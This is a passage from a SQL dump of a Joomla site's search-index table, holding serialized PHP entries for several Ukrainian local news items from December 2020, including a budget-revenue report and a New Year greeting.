00:00:00\";s:10:\"start_date\";s:19:\"2020-11-03 14:56:23\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4764,'index.php?option=com_content&view=article&id=2491','index.php?option=com_content&view=article&id=2491:ostanni-vzhe-istorichni-materiali-shchodo-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-11-misyatsiv-2020-roku&catid=8','Останні ( вже історичні матеріали) щодо виконання дохідної частини бюджетів міст, районів та ОТГ за 11 місяців 2020 року',' За даними Департамента фінансів Житомирської ОДА ','2020-12-16 14:56:27','5c57600370680e1e25947db85601946c',1,1,1,'*','2020-12-16 12:56:10','0000-00-00 00:00:00','2020-12-16 12:56:10','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2491\";s:5:\"alias\";s:129:\"ostanni-vzhe-istorichni-materiali-shchodo-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-11-misyatsiv-2020-roku\";s:7:\"summary\";s:262:\"	<p>За даними Департамента фінансів Житомирської ОДА<a class=\"modal\" href=\"https://malehus.in.ua/images/stories/censor.jpg\"><img src=\"https://malehus.in.ua/images/stories/censor.jpg\" alt=\"\" class=\"fr-fir\"></a>&nbsp;</p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-12-16 12:56:27\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:134:\"2491:ostanni-vzhe-istorichni-materiali-shchodo-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-11-misyatsiv-2020-roku\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:156:\"/index.php/8-novini-2/2491-ostanni-vzhe-istorichni-materiali-shchodo-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-11-misyatsiv-2020-roku\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2491\";s:5:\"route\";s:187:\"index.php?option=com_content&view=article&id=2491:ostanni-vzhe-istorichni-materiali-shchodo-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-11-misyatsiv-2020-roku&catid=8\";s:5:\"title\";s:213:\"Останні ( вже історичні матеріали) щодо виконання дохідної частини бюджетів міст, районів та ОТГ за 11 місяців 2020 року\";s:11:\"description\";s:93:\" За даними Департамента фінансів Житомирської ОДА \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-12-16 12:56:10\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-12-16 12:56:10\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4766,'index.php?option=com_content&view=category&id=129','index.php?option=com_content&view=category&id=129','Контакти',' ','2020-12-16 16:07:45','92078a424f7f5fe3c7d0660b2208a70b',1,1,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2020-08-27 15:32:33','0000-00-00 00:00:00',0,0,2,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:18:{s:2:\"id\";s:3:\"129\";s:5:\"alias\";s:12:\"rizni-porady\";s:7:\"summary\";s:2:\"		\";s:9:\"extension\";s:11:\"com_content\";s:10:\"created_by\";s:3:\"430\";s:8:\"modified\";s:19:\"2020-12-16 14:07:45\";s:11:\"modified_by\";s:3:\"430\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"author\";s:0:\"\";s:6:\"robots\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:3:\"lft\";s:3:\"167\";s:9:\"parent_id\";s:1:\"1\";s:5:\"level\";s:1:\"1\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":3:{s:15:\"category_layout\";s:0:\"\";s:5:\"image\";s:0:\"\";s:9:\"image_alt\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:4:\"slug\";s:16:\"129:rizni-porady\";s:6:\"layout\";s:8:\"category\";s:10:\"metaauthor\";N;s:4:\"path\";s:29:\"/index.php/video/rizni-porady\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"link\";i:4;s:7:\"metakey\";i:5;s:8:\"metadesc\";i:6;s:10:\"metaauthor\";i:7;s:6:\"author\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:8:\"Category\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:8:\"Category\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=category&id=129\";s:5:\"route\";s:49:\"index.php?option=com_content&view=category&id=129\";s:5:\"title\";s:16:\"Контакти\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-08-27 15:32:33\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4767,'index.php?option=com_content&view=article&id=2492','index.php?option=com_content&view=article&id=2492:21-grudnya-2020&catid=8','21 грудня 2020',' ','2020-12-21 16:54:47','a6109a8d0b10998628803a4b472d981a',1,1,1,'*','2020-12-21 14:54:47','0000-00-00 00:00:00','2020-12-21 14:54:47','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2492\";s:5:\"alias\";s:15:\"21-grudnya-2020\";s:7:\"summary\";s:366:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/20201221_03.jpg\"><img src=\"https://malehus.in.ua/images/stories/20201221_03.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/20201221_05.jpg\"><img src=\"https://malehus.in.ua/images/stories/20201221_05.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a><br></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-12-21 14:54:47\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:20:\"2492:21-grudnya-2020\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:42:\"/index.php/8-novini-2/2492-21-grudnya-2020\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2492\";s:5:\"route\";s:73:\"index.php?option=com_content&view=article&id=2492:21-grudnya-2020&catid=8\";s:5:\"title\";s:20:\"21 грудня 2020\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-12-21 14:54:47\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-12-21 14:54:47\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4770,'index.php?option=com_content&view=article&id=2493','index.php?option=com_content&view=article&id=2493:z-novim-2021-rokom&catid=8','З Новим 2021 роком!',' ','2020-12-29 14:52:58','74e5f8c292e8f7a40cc5a142320c22fa',1,1,1,'*','2020-12-29 12:52:22','0000-00-00 00:00:00','2020-12-29 12:52:22','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2493\";s:5:\"alias\";s:18:\"z-novim-2021-rokom\";s:7:\"summary\";s:183:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/2021_1.jpg\"><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/2021_1.jpg\" width=\"850\"></a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-12-29 12:52:58\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:23:\"2493:z-novim-2021-rokom\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:45:\"/index.php/8-novini-2/2493-z-novim-2021-rokom\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super 